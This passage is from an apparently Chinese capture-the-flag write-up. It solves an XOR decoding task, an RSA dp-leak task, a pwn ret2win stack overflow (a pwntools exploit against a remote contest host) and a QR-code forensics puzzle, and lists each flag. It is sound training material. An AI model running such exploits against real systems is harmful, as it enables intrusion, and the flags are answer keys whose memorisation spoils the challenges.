src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ZmMyM2YxY2JjMWJmZmNkZGIzMGY1MTE5ZTllNzBlOWNfR3FOYkVOZFpuZVB1NXhDMHlvTUFYREEzWjVuQmYzc29fVG9rZW46VlpobGJuNmpmb3FGZjV4WEltT2M1aXo1bkRnXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=MWNmMTdjMTkwOWRhNTI2NWU1NWVlYzkxODViMjFhYTNfanhRejExcklreXA3Sld5eUFKQ0JrOGhPYkp0YjFDWERfVG9rZW46Rmx0QmJTNE1ob3M4ajB4aU9WbmNNVGJCblliXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=MWQ3N2VhMmY5NGE3ODA4YTQxYTBmMWY1ZmMxMzFiNThfN0dNT0tCUUI1NDBRVkVKeHdHYVBDWElzWElqTjJmUDlfVG9rZW46Q0ZCZmJFOUNKb1FOSVZ4SURLR2M2eUd5bmZlXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>hex_data = \"0xcc 0xc6&nbsp;&nbsp; 0xcb 0xcd 0xd1 0x9d 0xcf 0x9e 0x92 0xcb 0x9c 0xc9 0xcb 0x87 0xce 0xcc 0xcb&nbsp;&nbsp; 0x98 0x87 0x9b 0x9b 0xcc 0x9a 0x87 0x93 0xc9 0x98 0x98 0x87 0x99 0x9a 0x9a&nbsp;&nbsp; 0x9f 0x9a 0x9f 0x9d 0x9f 0x9c 0x9b 0x98 0xce 0x87 0x92 0xcf 0x9c 0xcb 0x9e 0x9a&nbsp;&nbsp; 0x92 0xc8 0x87 0xce 0xcc 0xcb 0x98 0x87 0x9b 0x9b 0xcc 0x9a 0x87 0x92 0xc9&nbsp;&nbsp; 0x9b 0x99 0x87 0x99 0x9a 0x9a 0x9f 0x9a 0x9f 0x9d 0x9f 0x9c 0x9b 0x98 0xce&nbsp;&nbsp; 0xd7 0x00\"<br>&nbsp;<br>data_list = [int(x, 16) <em>for<\/em>&nbsp;&nbsp; x <em>in<\/em> hex_data.split()]<br>&nbsp;<br>key = 0xAA<br>result_values = [x ^ key <em>for<\/em>&nbsp;&nbsp; x <em>in<\/em> data_list]<br>result_chars =&nbsp;&nbsp; ''.join([chr(x) <em>for<\/em> x <em>in<\/em> result_values])<br>&nbsp;<br>print(result_chars)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{7e48a6ca-dfa2-11f0-9c22-30050575612d-8e6a408b-dfa2-11f0-8c13-30050575612d}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u4e03 RSA<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>Dp\u6cc4\u9732\u6a21\u677f\u9898<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=NDQ0MDNhMDNhY2VmOGJkNmQ5ZTYxMWZlOGY5MmUwZjZfcmpUeElVOHI3V21HTW1oNWxyRDNTOHk1TWNrMmpTcGtfVG9rZW46Wm5CRGIwejVXbzRvdkV4djhSN2NXb1p1bmhjXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><em>from<\/em> Crypto.Util.number <em>import<\/em>&nbsp;&nbsp; long_to_bytes<br>&nbsp;<br>n =&nbsp;&nbsp; 93977446509601491411273109183700477792476081212252100588514513996369916050240513858257713585313335366590846240370949831289684059273587772970292476296340120801189466605373324380976699533407970974215875662294283755613133719192114163547130089995306718768119144501566575807133141973499886356493323821201111393199<br>e = 65537<br>dp =&nbsp;&nbsp; 4646721143214293575763413674967142339122604220191663048739174575126624610789286103728040064106260338484738571999187838033377907298506299277252376843468857<br>c =&nbsp;&nbsp; 39842044108169653665655273759299059319749157454557086299529162182474598233474908300467494642550719706800866015430966154461050042032159169236220832726422011654867871818265524075008160875598938671421298968459869843510325230871429349578969045129760472874539862070944657591218420952191065002303403538259250208430<br>&nbsp;<br><em>for<\/em> k <em>in<\/em> range(1, e):<br>&nbsp;&nbsp;&nbsp; <em>if<\/em> (e *&nbsp;&nbsp; dp - 1) % k == 0:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; p = (e * dp - 1) \/\/ k + 1<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; n % p == 0:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"Found p: {p}\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; q = n \/\/ p<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; phi = (p - 1) * (q - 1)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; d = pow(e, -1, phi)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; m = pow(c, d, n)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(long_to_bytes(m).decode())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>break<\/em><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{L34k_0f_Dp_Br34ks_RS4_E4sy}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u9898\u76ee\u516b signin<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u5f88\u7b80\u5355\u7684pwn\u7b7e\u5230\u9898\uff0c\u6808\u6ea2\u51fa\u7ed9\u4e8664\u4e2a\u5b57\u7b26\uff0c\u7a0b\u5e8f\u7684win\u51fd\u6570\u80fd\u76f4\u63a5\u8bfb\u53d6flag.txt\u7136\u540e\u6253\u5370\u51fa\u6765\uff0c\u53ea\u9700\u8981\u7528\u6808\u6ea2\u51fa\u8986\u76d6vuln\u7684\u8fd4\u56de\u5730\u5740\u4fee\u6539\u6210win\u51fd\u6570\u7684\u51fd\u6570\u5730\u5740\u7136\u540e\u52ab\u6301ret\u5230\u90a3\u91cc\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><em>from<\/em> pwn <em>import<\/em> *exe = '.\/signin'elf = context.binary = ELF(exe)context.log_level = 'debug'sf = remote('101.200.152.81', 31059)win_addr = elf.symbols['win']log.info(f\"Win function address: {hex(win_addr)}\")rop = ROP(elf)ret_gadget = rop.find_gadget(['ret'])[0]log.info(f\"Ret gadget address: {hex(ret_gadget)}\")offset = 72payload = b'A' * offset + p64(ret_gadget) + p64(win_addr)sf.recvuntil(b'Say something to sign in:')sf.sendline(payload)sf.interactive()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{64be95c6-70e8-47a7-a75c-8fd3f4a30618}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u4e5d data<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u62ff\u5230\u7684qemu\u5728Linux\u4e2d\u6302\u8f7d\u5f97\u5230\u4e00\u5806word\u6587\u6863\u548cppt\uff0c\u6700\u540e\u53d1\u73b0\u9879\u76ee\u542f\u52a8-\u9879\u76ee\u8ba1\u5212.ppt\u7684\u8fd9\u4e2aPPT\u6253\u4e0d\u5f00\uff0c\u7528bandizip\u89e3\u538b\u51fa\u6765\u5f97\u5230all.zip\uff0c\u7136\u540e\u7ee7\u7eed\u89e3\u538b\u62ff\u5230\u4e00\u5806\u4e8c\u7ef4\u7801\uff0c\u5199\u811a\u672c\u62fc\u51fa\u6765\uff0c\u5f97\u5230\u4e00\u4e2a\u80fd\u626b\u51fa\u6765\u6bd4\u8f83\u6b63\u786e\u7684\u4e8c\u7ef4\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=MzM1ZTlkZDRlMjNjNWIzYWRlMTgxNzdjNTRjNDEwNjNfaUtjZWZ4Y1BuTTRZQXpWREFyT2V2ejg3VDlsQ3VlVDRfVG9rZW46U3Y4M2JWbEN3b2tXYll4R3ZoaGNkZVF2bm5nXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ODI4OGQ1ODkxYzZjYWVhMGQ0ZDUwYmYxOGE0NjQ4MDFfT2NrSjhmSUV3MFZNTWRRc2dRY2RjbHM0WURZVjFOcERfVG9rZW46R1lKSWJvV0Zkb25yWkJ4cXVrRmNiVllLbm5nXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ZjNjNjI1ZjA4ZTA2ZDRhZjNiNTU3ODQ4ZmU1NDFjYjRfQWFEODl5bGR2am9sak45Q1U1N0hCaEo2eXczSzhsTEVfVG9rZW46SXVZamJGanJzb0d5WGF4M2J5UGNJcERWbnVkXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8fd9\u4e2a\u4e8c\u7ef4\u7801\u626b\u51fa\u6765\u662fK5LGIS2TGBIXSVKEJJKVCVJRJBKGW4CZKNDFUSKUIVTTAUSWIJFFC2SWKZLFKWTBK5LGIWSVGFUFKVTKJF4VO3DIIZLFMULZKIYGG6KRKVCXSVLKLJDFKVSGIRLDCVSKKZDHAUCTKZSEUV2GJZMU4222IJLEMZCTKMYFUS2XKVDFOVCVOBFFE2S2JBKWYVSTKBKDAOKQKQYDS===<\/p>\n\n\n\n<p>\u7ecf\u8fc7base32-&gt;base64\u5f97\u5230YWJKD2P2TAMGNJXHVHLH4EPIB5UUFZYWYSXTV22ZXEUT2GG2AA2R6EQQCWUITZOIWIXSX6FATWRKFJYAVMJIF6GRUR======<\/p>\n\n\n\n<p>\u518d\u7528rot13-&gt;base32-&gt;base64\u5f97\u5230flag{4a154507-ba7d-3f79-8739-91533b2bafc7}<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=YTdlMGYxODNkM2FiYzRiMGQ2Y2Y2Y2IwYTUwZjQxZDdfT0VNOWlNd3lJeURJMUVnU0JiTWtMemRpS3hSVXZkUWZfVG9rZW46TjJ6eWJEVjMyb1pXclV4QkVSQWM5WlNZbmdnXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><em>import<\/em> os<br><em>from<\/em> PIL <em>import<\/em> Image<br><em>import<\/em> numpy <em>as<\/em> np<br>&nbsp;<br>def <strong>get_edges<\/strong>(<em>img<\/em>):<br>&nbsp;&nbsp;&nbsp; arr =&nbsp;&nbsp; np.array(<em>img<\/em>)<br>&nbsp;&nbsp;&nbsp; arr = (arr&nbsp;&nbsp; &gt; 128).astype(int)<br>&nbsp;&nbsp;&nbsp; top = arr[0,&nbsp;&nbsp; :]<br>&nbsp;&nbsp;&nbsp; bottom =&nbsp;&nbsp; arr[-1, :]<br>&nbsp;&nbsp;&nbsp; left = arr[:,&nbsp;&nbsp; 0]<br>&nbsp;&nbsp;&nbsp; right = arr[:,&nbsp;&nbsp; -1]<br>&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; top, bottom, left, right<br>&nbsp;<br>def <strong>is_white<\/strong>(<em>edge<\/em>):<br>&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; np.all(<em>edge<\/em> == 1)<br>&nbsp;<br>def <strong>edges_match<\/strong>(<em>e1<\/em>,&nbsp;&nbsp; <em>e2<\/em>):<br>&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; np.array_equal(<em>e1<\/em>, <em>e2<\/em>)<br>&nbsp;<br>def <strong>solve<\/strong>():<br>&nbsp;&nbsp;&nbsp; files = [f <em>for<\/em>&nbsp;&nbsp; f <em>in<\/em> os.listdir('.') <em>if<\/em> f.endswith('.png')]<br>&nbsp;&nbsp;&nbsp; images = {}<br>&nbsp;&nbsp;&nbsp; img_data = {}<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; <em># Pools<\/em><br>&nbsp;&nbsp;&nbsp; pools = {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'TL': [], 'TR': [], 'BL': [], 'BR': [],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'T': [], 'B': [], 'L': [], 'R': [],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'I': []<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Loading images...\")<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> f <em>in<\/em>&nbsp;&nbsp; files:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; img = Image.open(f).convert('L')<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; t, b, l, r = get_edges(img)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; img_data[f] = {'t': t, 'b': b, 'l': l, 'r': r}<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; wt, wb, wl, wr = is_white(t), is_white(b), is_white(l), is_white(r)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; wt and wl: pools['TL'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wt and wr: pools['TR'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wb and wl: pools['BL'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wb and wr: pools['BR'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wt: pools['T'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wb: pools['B'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wl: pools['L'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; wr: pools['R'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>elif<\/em>&nbsp;&nbsp; not (wt or wb or wl or wr): pools['I'].append(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"Unclassified: {f}\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> k,&nbsp;&nbsp; v <em>in<\/em> pools.items():<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"{k}: {len(v)}\")<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Computing matches...\")<br>&nbsp;&nbsp;&nbsp; right_matches&nbsp;&nbsp; = {f: [] <em>for<\/em> f <em>in<\/em> files}<br>&nbsp;&nbsp;&nbsp; bottom_matches&nbsp;&nbsp; = {f: [] <em>for<\/em> f <em>in<\/em> files}<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> f1 <em>in<\/em>&nbsp;&nbsp; files:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; f2 <em>in<\/em> files:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> f1 == f2: <em>continue<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> edges_match(img_data[f1]['r'], img_data[f2]['l']):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; right_matches[f1].append(f2)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> edges_match(img_data[f1]['b'], img_data[f2]['t']):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bottom_matches[f1].append(f2)<br>&nbsp;&nbsp;&nbsp; target_types =&nbsp;&nbsp; [<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'TL', 'T', 'T', 'TR',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'L',&nbsp; 'I', 'I', 'R',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'L',&nbsp; 'I', 'I', 'R',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'BL', 'B', 'B', 'BR'<br>&nbsp;&nbsp;&nbsp; ]<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; solutions = []<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; used = set()<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; def <strong>solve_4x4<\/strong>(<em>idx<\/em>,&nbsp;&nbsp; <em>current_grid<\/em>, <em>used_in_this_solution<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>ifidx<\/em> == 16:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em> list(<em>current_grid<\/em>)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; row = <em>idx<\/em> \/\/ 4<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; col = <em>idx<\/em> % 4<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; required_type = target_types[<em>idx<\/em>]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; candidates = [c <em>for<\/em> c <em>in<\/em> pools[required_type] <em>if<\/em> c not&nbsp;&nbsp; in used and c not in <em>used_in_this_solution<\/em>]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; valid_candidates = []<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; cand <em>in<\/em> candidates:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> col &gt; 0:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; left_neighbor = <em>current_grid<\/em>[<em>idx<\/em>-1]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> cand not in&nbsp;&nbsp; right_matches[left_neighbor]:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>continue<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> row &gt; 0:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; top_neighbor = <em>current_grid<\/em>[<em>idx<\/em>-4]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> cand not in&nbsp;&nbsp; bottom_matches[top_neighbor]:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>continue<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; valid_candidates.append(cand)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; cand <em>in<\/em> valid_candidates:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; res = solve_4x4(<em>idx<\/em> + 1, <em>current_grid<\/em> + [cand], <em>used_in_this_solution<\/em>&nbsp;&nbsp; | {cand})<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em> res:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em> res<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; None<br>&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"Solving quadrants...\")<br>&nbsp;&nbsp;&nbsp; quadrants = []<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> i <em>in<\/em>&nbsp;&nbsp; range(4):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sol = solve_4x4(0, [], set())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; sol:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(f\"Found quadrant {i+1}\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; quadrants.append(sol)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em> f <em>in<\/em> sol:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; used.add(f)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 